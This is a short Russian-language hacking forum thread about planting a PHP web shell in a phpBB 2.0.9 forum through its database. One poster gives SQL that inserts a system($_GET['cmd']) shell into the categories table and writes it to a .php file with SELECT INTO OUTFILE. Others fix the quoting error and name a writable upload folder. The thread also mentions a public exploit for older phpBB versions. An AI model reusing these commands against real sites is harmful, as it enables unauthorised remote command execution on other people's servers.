![]() |
Заливка шелла в phpBB 2.0.9 через SQL
Почему вылетает такая ошибка при востонавлениие БД. Что можно сделать.
Error importing backup file DEBUG MODE SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'cmd']); ?>', '10')' at line 1 INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', '', '10') Line : 980 File : /home/xxxxx/public_html/forum/admin/admin_db_utilities.php |
'cmd']); ?> - это что такое?)) шелл напоминает наполовину)
смотри таблицу phpbb_categories. Смотри значения таблицы..скорее всего в ней дело. точно не знаю. |
Цитата:
Писал всё правильно. INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', '<? system(GET['cmd']); ?>', '10'); Потом: SELECT cat_title INTO OUTFILE '/home/xxxx/public_html/forum/cache/shell.php' FROM phpbb_categories where cat_id=1; Не пойму чо за хрень такая... Цитата:
|
Цитата:
Цитата:
|
Ну дальше то что? Заслешировать то все равно надо.
Запрос к мускулу идет не правильный, хоть отедльный запрос, хоть востановление из бэкапа. |
Green_Bear сэнкс помогло=)
Теперь другая проблема - какая папка ещё может быть доступна для записи? А то Access denied =) |
images/avatars/
|
Цитата:
|
Вопрос вот по этому сплойту для пхпбб <2.0.10:
http://milw0rm.com/id.php?id=647 его исправлять надо или что, а то у меня лампочка на модеме не моргнула даже, а он пишет cant connect. |
images/avatars/ это папка доступна для записи просто это папка стоит на фильтрации зависимо от типа файлов и размера.
|
| Время: 21:05 |